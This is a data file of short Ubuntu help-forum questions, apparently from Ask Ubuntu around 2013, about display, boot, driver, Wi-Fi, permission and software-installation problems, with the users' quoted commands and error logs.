322320	ubuntu 12.04 unity : black screen with cursor only , when external display is connected before booting laptop	whenever i connect an external display to the dsub port of my laptop before booting into ubuntu , something goes wrong in unity to cause the exact same problem as described here : after logging in , there 's a black screen and my cursor , nothing else ! in ubuntu 12.10 rebooting without the display connected does not fix it . a once-off fix is to do this : sudo apt-get install ppa-purge sudo ppa-purge ppa : unity-team/staging sudo apt-get update sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install unity or , much quicker , this : unity -- reset sudo service lightdm restart my problem , however , is that i need to boot with the external display connected quite often . who knows what goes wrong inside unity and/or how to fix it permanently ?
322322	trouble installing ubuntu..usb.. picture below	ok so i 've spent all day trying to figure out the problem and still ca n't figure out what 's up.. so first i thought the main problem was the screen goes black after i hit `` install ubuntu '' .. so i look through some posts and figure out i just need to put `` nomodestep '' after splash ... well that did n't work so i compared my screen to the one in the tutorial and it 's totally different . my list of `` code '' or whatever is about 3 lines long.. the ones in the tutorial is a whole page worth of different stuff . so to recap , when i try to install ubuntu the screen goes black and when i try to edit the code i 'm getting a totally different screen with totally different `` code '' . i do n't know what to do and i ca n't find any other tutorials containing this problem . btw , i tried 12.04 and 13.04 and i followed the directions exactly so i do n't think that 's a problem . here 's the screen i get when i try to edit :
322326	drive ownership and permission - how do i make it accessible to all ?	i have an external drive on which i backed up data from another external drive using my ubuntu 12.10 system . now it would seem that there is a problem with folder and file permissions on the drive as i can not access the files from another system ( namely , my ipad through a verbatim mediashare wireless device and the app for it ) . some folders do not show their contents at all ( but the files are there thankfully , as they show up when i plug the drive to my ubuntu system ) , other files can not be opened . this only happened after backed up the date on the external drive . the same data on the other external drive on which it was backed up was accessible with no problem at all . my logical conclusion , and i have to stress that my knowledge is limited here , is that the problem is with the ownership and permission settings . i would like to make my external drive and the data on it , accessible to all ( those that plug it in ) so that i can access it on my ipad . actually , i am also open to the idea of having the drive accessible to all with some folders accessible to all with read / write permissions and with others with only read permissions or with no accessibility at all . that is what would like to do and i am also open to your suggestions on security issues ( i.e . making the setup more secure , as long as i can have access and read/write permissions on the drive while connected to my ipad ) . i am assuming that to do what i want i require accessibility available to all as well as read permissions , in the least .
322331	why is 'auto eth0 ' a problem to kernel > 3.2 ?	with this new question i refer to this previous question : is there `` force '' to be online ? why is 'auto eth0 ' in file /etc/network/interfaces a problem to the kernels > 3.2 ? when entry 'auto eth0 ' is given , and machine is unplugged to the network-cable , then machine can not boot further than `` configuring network '' and hangs itselfs up . when i delete 'auto eth0 ' then machine can boot normal without being plugged to the network-cable . this was not the case with kernel 3.2.x ( but when i want to be back to internet - have to add back 'auto eth0 ' again . )
322334	skype installation warning about harm to computer	i wanted to install skype for my ubuntu studio . but there was a warning that this type of file could harm my computer . what should i do ?
322336	in which repository is libreoffice to be found ?	i ca n't seem to find libreoffice in the repositories . i would please like to know where to find a copy of this office suite .
322337	ubuntu touch connecting to 3g the connection was not supported by ofono	i am trying to enable 3g on ubuntu touch . i am currently on the `` rogers '' network in canada and i have transferred my connection information to my phone , but when i run nmcli con up id `` rogers '' i get the following error : the connection was not supported by ofono this is for a gsm network which should be supported . i have posted my connection settings below : [ connection ] id=rogers uuid=0000000000000000000000000000000 # commented out type=gsm [ gsm ] number=*99 # username=wapuser1 password=wap apn=internet.com network-type=2 [ ipv4 ] method=auto [ serial ] baud=115200
322341	ubuntu 13.4 on dell n1710 usb install problems	i really need some help with this . i could n't find anything useful on the internet . my goal is to check that my laptop is compatible with ubuntu before i install and notice that i have no network for example . some info : the machine is a dell inspiron n7110 i made a boot disk with ubuntu 13.4 and anything i did while booting from it made the system to lock with a frozen cursor `` _ `` at the top left of the screen . to make the usb i used universal-usb-installer-1.9.3.7 and afterwards i made a new one with http : //www.linuxliveusb.com/en/download to reach the same conclusion . when i select to run from usb , the os loads up to that point and then hangs . i waited for 15-20 minutes just to see if it starts back up or it just takes long to load . ubuntu loads just fine from the usb on my old desktop , just not on the laptop .
322343	check-new-release process eating up resources on ubuntu server 13.04	a small ubuntu 13.04 virtual machine instance i run in a cloud environment regularly becomes slow/unresponsive because of a proces called check-new-release . is there any way to disable this process and maybe run it manually instead ?
322345	disabling/removing volume notification in ubuntu 12.04 ?	i removed notify-osd but then another notification started appearing instead when changing the volume : is there a way to remove this notification as well ? i use my logitech g110 keyboard 's volume controller to adjust the volume .
322356	qtquick not found ( lubuntu )	on a fresh lubuntu 13.04 installation , i installed qt5 from the official ubuntu repositories . but this installation of qt5 ca n't find the qtquick module . what am i missing ? qmlscene test.qml test.qml : import qtquick 2.0 rectangle { } output : file : ///home/ ... /test.qml:1 module `` qtquick '' is not installed i already double-checked that the following relevant packages are installed : $ dpkg -- get-selections | grep libqt5 libqt53d5 : amd64 install libqt5clucene5 : amd64 install libqt5concurrent5 : amd64 install libqt5core5 : amd64 install libqt5dbus5 : amd64 install libqt5declarative5 : amd64 install libqt5designer5 : amd64 install libqt5designercomponents5 : amd64 install libqt5gui5 : amd64 install libqt5help5 : amd64 install libqt5location5 : amd64 install libqt5network5 : amd64 install libqt5opengl5 : amd64 install libqt5opengl5-dev install libqt5printsupport5 : amd64 install libqt5qml5 : amd64 install libqt5quick5 : amd64 install libqt5quickparticles5 : amd64 install libqt5quicktest5 : amd64 install libqt5script5 : amd64 install libqt5sensors5 : amd64 install libqt5sql5 : amd64 install libqt5sql5-mysql : amd64 install libqt5sql5-sqlite : amd64 install libqt5svg5 : amd64 install libqt5test5 : amd64 install libqt5v8-5 : amd64 install libqt5webkit5 : amd64 install libqt5widgets5 : amd64 install libqt5xml5 : amd64 install
322360	should someone install apache , mysql etc . or use ready-made packets like xampp for php development ?	do you use a webserver development package ( like xampp ) or do you install apache , mysql , php per package for php / perl / python / etc . development ? what is your practical experience ? i have experienced so far : [ - ] xampp may causes some problems ( stability , performance , dependency with other packages ) on linux - ubuntu [ + ] xampp allows you easily to package your whole web development environment and share it with your team members [ ~ ] no easy updates with xampp via apt-get update ? but who really wants to stay his web-server development environment up-to-date ? ( by the way , i 'm using ubuntu 13.04 64bit . )
322361	ca n't use window controls on maximized windows	when i maximise a window and hover my mouse where the window controls should be , they do not appear however if i hover my mouse over the file menu bar , they do appear but as soon as i move my mouse back , it disappears as if my mouse was elsewhere . this is only on maximised windows and i 'm using ubuntu 13.04 . mouse over menu : mouse over window controls :
322363	errors with gpt and installing ubuntu alongside windows7	i have a brand new dell laptop with a 512e hard drive using gpt . ubuntu 12.04 in live cd mode does not recognize the presence of windows 7 or any partition for that matter : it shows a completely blank hd . windows 7 professional was installed this morning along with a partition set aside for ubuntu . i tried boot repair , here is the log : http : //paste.ubuntu.com/5895278 and there was no new result . i have a feeling it is the advanced format of my hd that is causing the problem . does anyone see a solution ?
322364	how to let mysql ( mysqld ) to create and write to `` /var/run/mysqld '' directory ?	i really do n't understand how all those privileges work in linuxes . to start mysql server mysqld program has to write its .pid files to /var/run/mysqld/ directory . but we know from fhs ( filesystem hierarchy standard ) that : files under this directory must be cleared ( removed or truncated as appropriate ) at the beginning of the boot process . so mysqld has to create /mysqld directory under /var/run/ every time mysql server is started . the owner and group of /var is root and /var is : drwxr-xr-x 13 root root 4096 may 20 23:41 var . and we also know from fhs ( filesystem hierarchy standard ) that : /var/run should be unwritable for unprivileged users ( root or users running daemons ) ; it is a major security problem if any user can write in this directory . so mysqld can not write to the directory . indeed when i run mysqld to start mysql server i always get an error : user @ user-desktop : ~ $ sudo mysqld -- console 130720 23:43:02 [ error ] ca n't start server : bind on unix socket : permission denied 130720 23:43:02 [ error ] do you already have another mysqld server running on socket : /var/run/mysqld/mysqld.sock ? 130720 23:43:02 [ error ] aborting the question is : how mysqld can write .pid files to /var/run/mysqld/ if standard forbids to open this directory for writing ? this is a clear contradiction , is n't it ? my question is : how to let mysqld to create and write its files to /var/run/mysqld/ without changing permissions of the /var/run directory ? for now i see the only way : user @ user-desktop : $ sudo chmod a+w /var but it is forbidden by the standard .
322365	massive issues with torrents	i 'm using kubuntu 13.04 and until some weeks ago i was perfectly able to download torrents via ktorrent . but suddenly when opening a magnet link via ktorrent , the torrent did n't start anymore ( not even when i used 'force start ' ) . i tested this with a .torrent file , but no result either . i then tried vuze and was at least able to get the torrent running , but at a very slow speed , with some speed heights sometimes ( short ) . using rtorrent also brought no improvement . the ( not so ) funny thing is that torrents work perfectly fine on my nettop , which also uses the same network as the concerned computer .
322370	task manager memory usage does not agree with `` top '' command memory usage	i just installed lubuntu 12.04 and have been monitoring memory usage with the `` top '' command and the task manager gui . i 'm currently seeing 448 mb of physical ram used with `` top '' . however , task manager is telling me that 202 mb is in use . i only have 500 mb total and am seeing decent performance , so i 'm wondering if `` top '' has an issue . can anyone explain the difference between `` top '' and task manager ? thanks !
322375	wine , compilation failed , need some advice	sorry for my bad english . i`m trying to compile chrisbmrs patched wine to support native d3d9 : https : //github.com/chrisbmr/wine/tree/d3dadapter9-wip . i 've tried to follow tips from readme file and i also tried to compile both ./tools/wineinstall and ./configure , but i constantly get errors : make [ 1 ] : entering directory `/home/wine-d3dadapter9-wip/dlls/d3d9' ../../tools/winegcc/winegcc -b../../tools/winebuild -- sysroot=../.. -fasynchronous-unwind-tables -shared ./d3d9.spec buffer.o d3d9_main.o d3dadapter9.o device.o directx.o query.o shader.o stateblock.o surface.o swapchain.o texture.o vertexdeclaration.o volume.o version.res -o d3d9.dll.so -ldxguid -luuid -ladvapi32 -lgdi32 -luser32 -lwined3d ../../libs/port/libwine_port.a d3d9_main.o : in function `dllmain ' : /home/wine-d3dadapter9-wip/dlls/d3d9/d3d9_main.c:159 : undefined reference to `d3dadapter9_destroy' /home/wine-d3dadapter9-wip/dlls/d3d9/d3d9_main.c:154 : undefined reference to `d3dadapter9_init' collect2 : error : ld returned 1 exit status winegcc : gcc failed make [ 1 ] : *** [ d3d9.dll.so ] error 2 make [ 1 ] : leaving directory `/home/wine-d3dadapter9-wip/dlls/d3d9' make : *** [ dlls/d3d9 ] error 2 compilation failed , aborting install . or configure : libosmesa development files not found ( or too old ) , opengl rendering in bitmaps wo n't be supported . configure : libd3dadapter9 development files not found . native direct3d9 wo n't be supported . configure : libhal development files not found , no legacy dynamic device support . configure : libldap ( openldap ) development files not found , ldap wo n't be supported . please , point me in the right direction . i appreciate any help . thanks . os : ubuntu13.04 , gpu : nvidia 9200m , driver : nvidia xorg 313 .
322378	installed ubuntu studio , got standard version	i tried to install 13.04 alongside with windows 7 , but it completely fails and just reboots . so now i tried to install 12.10 , which i have had previous success , fail . i ran the demo and it worked just fine . it was exactly what i expected . i used wubi in win 7 to install ubuntu studio , everything seemed fine until i restarted and was booted into ubuntu 12.10 , not studio . i have none of the production software , and the interface is completely different . how can i get the version of ubuntu studio ?
322385	is there any soundcloud desktop client except tomahawk ?	i 'm looking for a soundcloud desktop client . i found this post quite relevant , and somebody has suggeted tomahawk , but the post is pretty old : are there any desktop clients for soundcloud ? is there any great desktop client to browse your sets , listen to your tracks , search for and listen to new tracks , create sets , upload your tracks , and follow people all from inside the client ?
322387	iredmail mail prox . for ubuntu 13.04 ?	iredmail version : 0.2.2 store mail accounts in which backend ( ldap/mysql/pgsql ) : mysql linux/bsd distribution name and version : ubuntu 13.04 - related log if you 're reporting an issue : hi , i just setup iredmail , i am able to receive emails , but not send them . when i go into my domain it 's asking for me to put in a `` mx 1 / prio : `` and i have no clue what that would be . my domain is dbatease.com . please help !
322390	do i have the correct drivers for my machine ?	i just installed ubuntu 12.04 lts on my acer aspire 7745g . it is definitely running slower than it should . here are my machine specifications : memory : 15.6 gib processor : intel core i7 cpu q 720 @ 1.60ghz x 8 graphics : ati mobility radeon hd 5650 1 gb ( although ubuntu is saying : vesa : madison ) os type : 64-bit disk : 475.4 gb i specifically noticed it was running slower when i ran a program i wrote to read and write information in a database . i tested the same program on my lenovo think pad-t61 which also runs ubuntu 12.04 lts with the same exact software ( python and mysql ) . my lenovo thinkpad was running the same program at about 2 to 3 times faster ! here are the specifications of my lenovo thinkpad : memory : 2.9gib processor : intel core 2 duo cpu t8100 2.1ghz x 2 graphics : nvidia accelerated graphics driver ( though ubuntu says unknown ) os type : 64-bit disk : 95.3 gb clearly , my acer aspire should be loads faster than my lenovo thinkpad . this makes me wander if my software is interacting optimally with my hardware and if i have the right drivers installed . how can i determine if my machine is configured to run optimally ? for what other reasons would my acer run slower ? all help is greatly appreciated . if you need more information about my machines let me know !
322396	will my server reboot itself if the memory fills up ?	i just got a vds , all said and done with my website , forums and email server set up along with my teamspeak server . my memory usage is at 60 % when it boots and grows to 70 % after about 3 hours of running . i 'm just curious on what will happen if the memory fills up and would it notify me in some way if it did ?
322397	recording phone calls	does anyone know how i can record audio from a voip phone call ? i 've tried to do it before , and all i get is my side of the conversation . i 'm using ubuntu 12.04 , skype , and sound recorder .
322402	how do i fix an error about unclean file system ntfs when mounting ?	i have install ubuntu 13.04 along side with window8 the first time i can use it very well but after few time i restart my machine and i try to use the file from another hdd ( i have 2 hdd 1 is 160gb which i install the os on it.2 is 1000gb what i have in it just the photo file , video , movie and song ) .now when i start up my machine and i try to view file in my 2 hdd what i have is this message ... i want to show a picture but i can not the picture of my error is here..
322404	is there a driver for canoscan d646u scanner ?	is there a driver for canoscan d646u scanner ? i am using ubuntu 12.04 lts , and ca n't get my scanner to work .
322405	how do i migrate to a raid10 array without losing data	i am running ubuntu 12.04lts , os is installed on a small ssd so that should not be an issue when modifying the raid array ( s ) . i currently have four 2tb wd caviar green drives that i would like get into a raid10 array ( stripe of mirrors , i think ) . the problem is that i have a little bit over 2 tb of data that i would like to keep , and no good way to back it up . at present , i have them set up as two different raid0 arrays , and manually copied the data from one to the other just in case . my other issue is that disk utility says that the partitions are misaligned by 506880 and 507392 bytes , and i would like to fix that ( if it is indeed an issue at all ) . i do n't really understand the particulars of how advanced format drives need to be partitioned . i do have a 1tb drive in another computer that could be used temporarily , possibly allowing me to have 3 drives to play around with . not sure if that helps any .
322412	quicktime plugin in browser	i 'm running a clean install of ubuntu 13.04 and can not get a web browser to play any quicktime content . installed mediabuntu and codecs noted here : watch quicktime videos in the browser ? tried firefox & chrome , but prefer to get this working in chrome . using an astak webcam as a baby monitor , which unfortunately uses a quicktime codec . back trying linux distros after a lengthy break .
322416	startup applications in an assigned workspace	i can get applications to start on login using the gui applet in ubuntu . is there anything that can be added to the command line so it starts in an assigned workspace ? i have n't been able to get gdevilspie to work .
322417	wi-fi not working in ubuntu 13.04	i recently upgraded my ubuntu 12.04 desktop to 13.04 . when it rebooted after upgrading , i noticed that it had not connected to my wi-fi network . when i try to connect , one of two things happen : it thinks for a second , without asking me for a password , and then pops up a notification that says that it did not connect ( says `` disconnected . you are now offline . '' ) or it thinks , prompts me for a password , thinks , and prompts me again . ( never-ending cycle ) i have tried multiple things , but ca n't seem to connect . i first thought that it might be a driver issue , but how would it find the wi-fi network if there was no driver ? i am hoping that someone knows what is happening and how to fix it ! thanks , wasabi fan
322422	lts vs non lts which is more suitable to me ?	i am new to ubuntu i want to know which is more suitable to me ? i want to use if for web design and hosting and for programming
322423	installing software from source	i 'm trying to understand the rational behind installing from software from source in ubuntu 12.04 . obviously , i know i can download what i need from repos , but i want to develop a deeper understanding of linux . as a windows users , when i download a program i double click it , and it installs into the program files directory unless i specify otherwise . when i want to uninstall it , windows has a tools that does that for me . when i install a program in linux , where does it install to ? how do i uninstall it afterwards ? are there residual files left over ? how would i tell if it 's been fully removed ? for instance , i 'm going to install lmms ( linux multimedia studio ) from source . i download and decompress the tar ball , and have a folder name lmms_xxx.tar ( whatever ) . the folder is now on my desktop with an install file . if i run the install file from that location , does it install into that folder ? if so , can i move that folder to where ever i want ? i want thinking about putting it in /opt/lmms
322425	help ! grub rescue mode	i have a laptop which is partitioned with windows 7 and fedora 18 . i tried to delete f18 in partition manager in windows 7 and then when i restarted my computer it would still go to grub launcher and show fedora , fedora with advanced options and windows 7 . then i installed ubuntu and when i restarted the system it said : grub loading.. welcome to grub ! error : disk 'lvm/fedora-boot ' not found . entering rescue mode ... grub rescue >
322426	single bluetooth keyboard on multiple computers ?	is it possible to use a single bluetooth keyboard on multiple computers ( not simultaneously ) ? ? ie : i have two laptops ( from the company and my own ) and every time i try to switch between them , i need first to remove the keyboard and reconnect ( re add ) . otherwise it wou n't work . looks like once the connection is made , the keyboard works only with that specific laptop . and if i try to change to the other computer i need to recognize the keyboard again . ps : synergy is not an option for me since it requires a client / server connection . thx .
322428	program to draw 3d charts graphics ?	i want to create something like the image : can anyone suggest a simple application to achieve this ?
322433	how to launch dolphin file manager from command line or bash script ( and give it a path ) ?	i want to open a dolphin window from a bash script . it may not be relevant to the question , but i will be connecting to an sftp location in dolphin . first i tried this command from my script : dolphin sftp : //myhost:1234 this results in several warnings : kdeinit4 : shutting down running client . klauncher : exiting on signal 15 connecting to deprecated signal qdbusconnectioninterface : :serviceownerchanged ( qstring , qstring , qstring ) qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . kde daemon ( kded ) already running . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . kbuildsycoca4 running ... kbuildsycoca4 ( 13252 ) kconfiggroup : :readxdglistentry : list entry mimetype in `` /usr/nx/share/applnk/x-nxclient/nxclient.desktop '' is not compliant with xdg standard ( missing trailing semicolon ) . kbuildsycoca4 ( 13252 ) parselayoutnode : the menu spec file contains a layout or defaultlayout tag without the mandatory merge tag inside . please fix your file . kbuildsycoca4 ( 13252 ) parselayoutnode : the menu spec file contains a layout or defaultlayout tag without the mandatory merge tag inside . please fix your file . dolphin ( 13244 ) kxmlgui : :actionlist : :plug : index 19 is not within range ( 0 - 11 kio_trash ( 13254 ) trashprotocol : :createudsentry : could n't stat '' /home/user/.local/share/trash/files/.ds_store '' next i tried this command from my script : dbus-launch dolphin sftp : //myhost:1234 this results in even more warnings : kdeinit4 : shutting down running client . connecting to deprecated signal qdbusconnectioninterface : :serviceownerchanged ( qstring , qstring , qstring ) qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . kbuildsycoca4 running ... qdbusobjectpath : invalid path `` '' qobject : :connect : can not connect ( null ) : :devicefound ( device* ) to bluedevildaemon : :devicefound ( device* ) qobject : :connect : can not connect qtimer : :timeout ( ) to ( null ) : :stopdiscovery ( ) qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . no outputs have backlight property qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . dolphin ( 13176 ) kxmlgui : :actionlist : :plug : index 19 is not within range ( 0 - 11 qdbusconnection : name 'org.kde.kglobalaccel' had owner '' but we thought it was ':1.5 ' warning from helper : reading brightness failed with error code 5 `` no such file or directory '' warning from helper : reading brightness failed with error code 5 `` no such file or directory '' kded ( 13187 ) powerdevilupowerbackend : :brightness : org.kde.powerdevil.backlighthelper.brightness failed warning from helper : writing brightness failed with error code 5 `` no such file or directory '' warning from helper : writing brightness failed with error code 5 `` no such file or directory '' kded ( 13187 ) powerdevilupowerbackend : :setbrightness : org.kde.powerdevil.backlighthelper.setbrightness failed kio_trash ( 13205 ) trashprotocol : :createudsentry : could n't stat '' /home/user/.local/share/trash/files/.ds_store '' how do i launch dolphin file manager from a bash script and give it an ( sftp ) path ?
322437	i cant make a partition for ubuntu	i am running windows 8 and i want to dual boot with ubuntu 13.04 . according to this post : installing on a pre-installed windows 8 system ( uefi supported ) i should make the partition for ubuntu in windows 8 . i opened disk management , shrunk my c : drive , but i also saw in a video that someone make a swap drive . should i also make swap drive , can i make it on windows 8 , and can i format the ubuntu drive to ext4 in windows 8 ? should i be doing this on windows 8 or ubuntu ? what are the options either os ?
322439	color calibration in ubuntu and xerox 8570 printer	the thumbnail size images show normal color of object . after double-clicking an image , appears off-color like it 's shaded red . printed photos are also off color . ubuntu color setting states xerox phaser 8500dn is uncalibrated . i 've been searching and searching and ca n't find any hints on how to fix this . my knowledge regarding ubuntu ( & pc 's ) is on the low side of moderate . i do n't want to keep downloading stuff i know nothing about - any suggestions out there beside throwing my computer out the window .
322443	if i upgrade from ubuntu 12.10 to 13.04 , and then to 13.10 and so ... will i have any problem ?	if i upgrade from ubuntu 12.10 to 13.04 , and then to 13.10 and so ... will i have any problem ? greetings from argentina .
322445	windows 7 freezes on 'starting windows ' screen after installing ubuntu 12.04	i just installed ubuntu 12.04 alongside win7 . i have done exactly this before , but my hard drive had to be replaced ( unrelated reasons ) and i had to start again . install went through smoothly , i rebooted the system , and 2 entries for win7 came up in grub ( alongside the usual ubuntu ones ) . for some reason , it detected the recovery partition ( 100 odd mb ) as a separate win7 os . this had not happened last time . when i press enter on either of these win7 entries , the splash screen comes up but freezes on 'starting windows ' . ubuntu boots fine . running 'bootrec /fixmbr ' from the win7 dvd fixes the mbr and win7 boots fine after that , suggesting no corruption on win7 . something grub is doing is preventing windows from booting properly . please help !
322455	where/when can i buy a native ubuntu superphone ?	i 'm not a techie , so i do n't want to convert another phone . i want to buy an `` off-the-shelf '' , ready-to-go , fully supported ubuntu superphone . where/when can i buy a native ubuntu superphone ?
322456	what recommended windows software should i download for wine ?	the ubuntu nooby here again , and i think i borked my wine install . i 'm learning things through terminal , so that should make things a little easier the 2nd time around , but i did something wrong , because nothing works . to make a long story short , i tried to go through and download software that i thought i needed to run some windows games on wine , such as directx and .net framework . however , when i installed that , or at least , thought i did , now , none of my games work , even ones that worked before . to save all of you lovely people in the ubuntu community from having to hold my hand as i carom around from error to error , is there a way i can `` start fresh '' , so to speak -- completely uninstall everything wine-related and start over ? hopefully , this time , with a recommendation from one of you as to what software i need to properly mimic windows ? there 's a lot , i know -- but i had no idea just how much until i started working with ubuntu . i know about directx and .net framework , but is there anything else ? thanks in advance !
322457	apt-add-repository not working on ubuntu 13.04 set up on vmware	i have set up ubuntu 13.04 64 bit as a virtual machine using vmware player . when i try to add the following repository i am getting an error . i have searched many articles to find an answer but every article out there talks about proxy . but i am not using any proxy , it is a simple virtual machine set up on vmware . this is the command i execute and the error message i get : testuser @ ubuntu : ~ $ sudo apt-add-repository ppa : gnome-team/gnome3 [ sudo ] password for testuser : can not access ppa ( https : //launchpad.net/api/1.0/~gnome-team/+archive/gnome3 ) to get ppa information , please check your internet connection .
322458	how to open jar file using open jdk ?	i installed `` open jdk 7 '' on ubuntu 13.04 , but not recognized in `` other application '' list to set as default . i need to open a `` .jar '' file with `` open jdk7 '' . please help .
322465	how to get amd graphics card working on kernel 3.10.x ?	i 'm running kubuntu 13.04_x64 on my sony vaio sve171e13l . the notebook has an amd radeon hd7650m graphics card . up until now , i 've been using the amd proprietary driver ( amd catalyst 13.4 ) . after building the 3.10 ( now 3.10.1 ) kernel , however , i no longer had a graphical interface ! it turns out that 3.10 has introduced a major change in the /proc filesystem api . ( according to the bug report for broken fglrx driver . ) the fglrx driver no longer builds . i tried purging the proprietary driver and installing the open source driver with no success . in retrospect , that 's not surprising , as the open source driver is an older version of the amd driver . i also tried the beta catayst 13.6 , but that did n't work either . that version predates the kernel as well . has anyone found a way to get an amd graphics card working with this kernel ? ! ? i 've searched and searched , but i 've been unable to find anything that will help me get this working ! in fact , i 've barely found any references to this issue at all ! surely this kernel was n't released knowing that everyone with an amd graphics card would be unable to use it ! ! ! thanks for any suggestions ! edit : 7/21/2013 i wanted to clarify in response to @ edwin 's comment ... this is n't a bug , per se , although i did see that someone had filed a bug report . from what i read on the issue , it 's simply a matter that that there was a somewhat major change in kernel 3.10 , and the amd driver has n't been updated to deal with it . i 'm simply asking if anyone with an amd graphics card has successfully built 3.10 , and , if so , how ? ! ?
322480	what do i get rid of to install ubuntu when i have 4 primary partitions ?	i am very new to ubuntu and linux in general , so any advice is appreciated . i am following the `` dual-boot windows 7 and ubuntu in perfect harmony '' tutorial on lifehacker to do exactly that . this is the link . i am at the step of partitioning my system , i already have windows installed but i am in the ubuntu live . when i go into the gparted partition editor and try and select `` new '' i get this message : it is not possible to create more than 4 primary partitions . if you want more partitions you should first create an extended partition . such a partition can contain other partitions . because an extended partition is also a primary partition it might be necessary to remove a primary partition first thats all ! wow ! ubuntu 's community is amazing , i was expecting at least a day wait for an answer . anyways , here is the picture : also , i forgot to tell you , but i am on a laptop for this project , if that changes anything . thanks for all of you help so far !
322483	unable to access â44 gb volumeâ error mounting /dev/sda2	i have a compaq laptop which received a bump yesterday . after that , the system does n't load the windows 7 , i get the blue screen error each time i try to load . i also have ubuntu 13.04 installed on the system , through which i can access all my drives except the c : drive ( which is so called in windows ) i have some important files in that drive can somebody suggest me how to retrieve them ? thanks in advance
322486	increase sound level	is it possible to set the default sound level more than 100 % ? every time after booting i have to manually increase the sound level from the sound settings which is a bit irritating . i am using ubuntu 13.04 .
322489	live cd fails to boot : asking all remaining processes to terminate	i want to install ubuntu 13.04 alongside windows 7 . using cd , when i click on 'install ubuntu ' , it shows me `` asking all remaining processes to terminate '' message and the boot cd is ejected . the system boots with windows again and i 'm not able to install ubuntu . please help .
322490	ca n't switch back from noveau driver to nvidia proprietry driver	today out of curiousity i switched back to noveau driver from my nvidia proprietry 310 driver all went well but now when i tried to enable the proprietry driver my system automatically reverted back to noveau and i am getting big ugly screen of 640 x 800 resolution please help and fortunately i had created a back of my whole filesystem ( / ) and stored it in my windows partion so if i reinstall ubuntu then how can i restore from backup my applications and settings .please help
322493	how do i get the session option for kde in the login screen ? ( installed kde-full )	i 've installed the package kde-full in ubuntu 12.10 . as i know i should be able to switch to kde on the login screen , after it is installed . however , i only see two options : ubuntu 3d ubuntu 2d what should i do to log in to a kde session ?
322494	edit text file with sudo via ssh and script	i want to modify /etc/hosts ( and later also hostname ) via a script and ssh . so i 'm logged in via ssh and this works : sudo nano /etc/hosts it shows the remote hosts file in nano . however i was trying this ( via commandline , but this should work in order to make it work in a script right ? ) : echo [ mypassword ] | sudo -s nano /etc/hosts but get this output : recieved sighup or sigterm buffer written to /etc/hosts.save i just saw that this also happens with more simple text-files ( e.g . test.txt ) . any ideas how to fix this ? and yes , i am aware of the insecurity of the clear password . : ) thanks in advance
322500	power management issue ?	am new on ubuntu yesterday i installed ubuntu 12.04 lts on my pavilion g6 notebook pc with intel cote i7-3612 cpu and 4 gb ram and am facing many problem and i ca n't solve any of them . - wireless signal is too low . -the laptop is always over heated ( hp coolsense is not working and i guess this will harm my hp ) - the battery get empty very fast ( +3:30 hours on windows , 1:20 hour on ubuntu ) i 've read many threads that talk about this issue and i tried to use the commands they recommended but it did n't work with me . i hope you can help me with these issues and it would be great if there was a step by step solution because am a first time user . thanks in advance .
322511	no wireless with intel centrino advanced-n 7260	i have just bought a new laptop . acer v7-582pg . everything works great with ubuntu , exept the wireless module . i have tried ubuntu 13.04 and 13.10 beta . still no luck . it is kind of a new wireless card , so there is very little information out about it . lspci : 04:00.0 network controller : intel corporation wireless 7260 ( rev 63 ) sudo lshw -c network ubuntu @ ubuntu : ~ $ sudo lshw -c network *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : 63 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : b3500000-b3501fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.1 bus info : pci @ 0000:05:00.1 logical name : eth0 version : 14 serial : 08:9e:01 : c3:24:50 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=10.0.0.106 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:62 ioport:4000 ( size=256 ) memory : b3404000-b3404fff memory : b3400000-b3403fff rfkill list all ubuntu @ ubuntu : ~ $ rfkill list all 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no 1 : acer-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no
322514	terminal command with sudo takes a long time	i noticed that the terminal recently becomes too slow when i execute a command that needs my password . it takes some seconds to display [ sudo ] password for ...
322516	spec check program for ubuntu ?	is there a program for ubuntu in checking system specs ? i 've tried the onbard one that comes with ubuntu but it only shows me the amount of memory , graphics , cpu and sound - although i need alot more than that as they 're stil only brief descriptions . motherboard and such needs to be included too
322521	how do i set the kde panel to be a long continuous one across dual monitors ?	i 'm using kde with two monitors , and i 'd like to set the panel on the desktop to be a long continuous panel along the bottom of both monitors , instead of the two separated panels . how could i do that ? : ) i hope you understand what i want . : d
